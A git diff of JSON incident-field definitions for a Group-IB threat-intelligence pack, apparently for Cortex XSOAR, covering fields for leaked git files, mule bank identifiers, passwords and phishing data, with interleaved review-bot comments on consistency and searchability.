@@ -0,0 +1,158 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Git Leak" + ], + "caseInsensitive": true, + "cliName": "gibosigitrepositoryfilestable", + "closeForm": true, + "columns": [ + { + "displayName": "File ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "fileid", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "File Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "filename", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Hash", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "hash", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Created", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datecreated", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Date Detected", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datedetected", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Author Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "authorname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Author Email", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "authoremail", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": 
"Url", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "url", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Data Found", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datafound", + "orgType": "longText", + "required": false, + "script": "", + "selectValues": [], + "type": "longText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibosigitrepositoryfilestable", + "isReadOnly": false, + "locked": false, + "name": "GIB OSI Git Repository Files Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Git Leak" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json new file mode 100644 index 000000000000..ccbabd052f00 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json 
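Review bot: The `datafound` column is the only one in this grid whose `selectValues` is `[]`; the other eight columns, `fileid` through `url`, all use `null`, so the mixed form looks accidental and `"selectValues": null,` would keep the column definitions uniform. Separately, the grid is attached to `GIB OSI Git Leak` and keeps `"unsearchable": false`, so whatever the mapper writes into the `Data Found` longText column is indexed for free-text search across incidents; that column presumably carries the leaked content itself (the mapper is outside this hunk, so this is inferred from the name), in which case `"unsearchable": true` on the grid is worth considering.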
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationbic", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationbic", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization BIC", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json new file mode 100644 index 000000000000..dfcbb1f0291e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationbsb", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationbsb", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization BSB", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json new file mode 100644 index 000000000000..1c9e5d335c74 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationclabe", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationclabe", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization CLABE", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json new file mode 100644 index 000000000000..ed007bfe6db5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationiban", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationiban", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization IBAN", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json new file mode 100644 index 000000000000..9fbd5f2a1b78 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationname", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationname", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization Name", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json new file mode 100644 index 000000000000..72a9b95a9ca6 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationswift", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationswift", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization SWIFT", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json new file mode 100644 index 000000000000..7a68d30931ee --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibparsedlogindomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibparsedlogindomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Parsed Login Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json new file mode 100644 index 000000000000..c4d935893ca4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibparsedloginip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibparsedloginip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Parsed Login IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json
index 39291d0ec7d0..f514f2a7c572 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json
@@ -2,7 +2,8 @@
 "associatedToAll": false,
 "associatedTypes": [
 "GIB Compromised Account",
- "GIB Data Breach"
+ "GIB Data Breach",
+ "GIB Compromised Account Group"
 ],
 "caseInsensitive": false,
 "cliName": "gibpassword",
@@ -26,5 +27,12 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Account",
+ "GIB Data Breach",
+ "GIB Compromised Account Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json
new file mode 100644
index 000000000000..75dc21852741
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json
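Review bot: `"unsearchable": false` stays on a field that now also holds the plaintext password for the newly associated `GIB Compromised Account Group` incident type, so every value written to `gibpassword` is indexed for free-text search across all incidents; unless searching on this field is a requirement, `"unsearchable": true,` is the safer default here and in the new `gibpasswords` field in the next hunk (`GIB_Passwords.json`), which has the same setting. The added `systemAssociatedTypes` list mirrors `associatedTypes` exactly, as in the other modified fields, so that part is consistent.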
@@ -0,0 +1,33 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Data Breach"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibpasswords",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibpasswords",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Passwords",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Data Breach"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json
index 9a5c580b1421..bfcd258fea78 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Compromised Card"
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
 ],
 "caseInsensitive": false,
 "cliName": "gibpaymentsystem",
@@ -25,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json
index 26298fdc55b1..9fb22bb81a6d 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json
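Review bot: `GIB_Passwords.json` lacks the `"itemVersion": "1.4.2"` entry that every other new field in this commit carries (compare `GIB_Parsed_Login_IP.json` and `GIB_Phishing_Brand.json`), and its `"caseInsensitive": true` contradicts the sibling `gibpassword` field in the previous hunk, which is `false`. Password values are case-sensitive, so `"caseInsensitive": false,` is the setting that agrees with the existing field, and adding `"itemVersion": "1.4.2",` after `"isReadOnly": false,` keeps the file in line with the rest of the set.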
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json @@ -27,5 +27,12 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain", + "GIB Compromised Account", + "GIB Compromised Card" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json new file mode 100644 index 000000000000..f373e6113609 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingbrand", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingbrand", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Brand", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json new file mode 100644 index 000000000000..992c11a32755 --- /dev/null 
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdateadded", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingdateadded", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Date Added", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json index 37941a7999dd..3c9573d6cba1 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Brand Protection Phishing" + "GIB Brand Protection Phishing", + "GIB Attacks Phishing Group" ], "caseInsensitive": true, "cliName": "gibphishingdateblocked", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Attacks Phishing Group" + ] } \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json new file mode 100644 index 000000000000..9ba127c8e03f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdatedetected", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingdatedetected", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Date Detected", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json new file mode 100644 index 000000000000..8fbeb1b9f95c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json 
@@ -0,0 +1,35 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingdateupdated",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "gibphishingdateupdated",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Date Updated",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "5.0.0",
+ "toVersion": "99.99.99"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json
index f1df81d0db83..431b589c6e30 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Brand Protection Domain"
+ "GIB Brand Protection Domain",
+ "GIB Attacks Phishing Group"
 ],
 "caseInsensitive": true,
 "cliName": "gibphishingdomain",
@@ -25,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
-}
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain",
+ "GIB Attacks Phishing Group"
+ ]
+}
\ No newline at end of file
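Review bot: The new GIB_Phishing_Date_Updated field in this hunk is the only one in the batch whose `"id"` lacks the `incident_` prefix (`"id": "gibphishingdateupdated"` versus `"id": "incident_gibphishingdateadded"` in the sibling Date_Added and Date_Detected files) and the only one pinned to `"fromVersion": "5.0.0"` with a `"toVersion": "99.99.99"` cap, while every other new field here declares `"fromVersion": "6.10.0"` and no toVersion. That looks like an export from an older pack revision rather than a deliberate difference. I would change it to `"id": "incident_gibphishingdateupdated",` and `"fromVersion": "6.10.0"` and drop the toVersion line so the three Phishing Date fields stay uniform.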
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json
new file mode 100644
index 000000000000..a6647bfc6f12
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json
@@ -0,0 +1,37 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingdomainexpirationdate",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingdomainexpirationdate",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Domain Expiration Date",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json
new file mode 100644
index 000000000000..ead822043591
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json
@@ -0,0 +1,37 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingdomainpuny",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingdomainpuny",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Domain Puny",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json
new file mode 100644
index 000000000000..170b9219148b
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json
@@ -0,0 +1,94 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingiptable",
+ "closeForm": true,
+ "columns": [
+ {
+ "displayName": "IP",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "ip",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Country Code",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "countrycode",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Country Name",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "countryname",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Provider",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "provider",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ }
+ ],
+ "content": true,
+ "defaultRows": [
+ {}
+ ],
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingiptable",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing IP Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "grid",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json
new file mode 100644
index 000000000000..1a69a13ba581
--- /dev/null
